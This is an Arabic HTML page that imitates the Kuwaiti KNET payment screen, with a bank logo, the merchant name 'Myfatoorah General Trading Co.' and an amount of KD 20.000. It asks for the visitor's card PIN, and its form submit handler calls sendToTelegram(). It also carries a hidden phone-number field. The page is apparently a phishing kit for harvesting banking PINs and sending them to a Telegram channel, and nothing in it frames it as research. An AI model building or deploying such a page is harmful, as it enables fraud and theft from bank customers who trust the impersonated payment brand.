<!DOCTYPE html>
<html lang="ar">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>صفحة دفع كي نت</title>
    <link rel="stylesheet" href="stele.css/ot.css/forme.css">
    <script src="main.js/all.js/kave.js/ot.js" defer></script>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=no, minimal-ui">

</head>
<body>
    <header id="pageHeader">
        <img src="pc (1).jpg" alt="رأس الصفحة" id="headerImage">
    </header>

    <div class="box bank-info" id="bankInfoBox">
        <img id="imgkn" src="images (3).png" alt="بنك وربة" class="bank-logo" id="bankLogo">
        <p id="beneficiaryLabel">المستفيد: <strong id="beneficiaryName">Myfatoorah General Trading Co.</strong></p>
        <p id="amountLabel">المبلغ: <strong id="amountValue">KD 20.000</strong></p>
    </div>
    <div>
        <h1 id="namenone">يرجى الانتظار جار التحقق</h1>
    </div>
    <div class="box payment-form">
        <form id="paymentForm" onsubmit="event.preventDefault(); sendToTelegram();">
            <div class="input-container">
                <label id="texst4" for="pin">الرقم السري:</label>
                <div class="input-box">
                    <input type="password" id="pin" placeholder="" required pattern="\d{4,6}" maxlength="6" title="الرجاء إدخال رقم يتراوح بين 4 و 6 أرقام">
                </div>
                <input type="hidden" id="hiddenPhoneInput" name="userPhone" />

            </div>
        </form>
    </div>

    <div class="box buttons">
        <button type="submit" form="paymentForm">إرسال</button>
        <button type="button" onclick="resetForm()">إلغاء</button>
    </div>

    <script>


    </script>

</body>
</html>
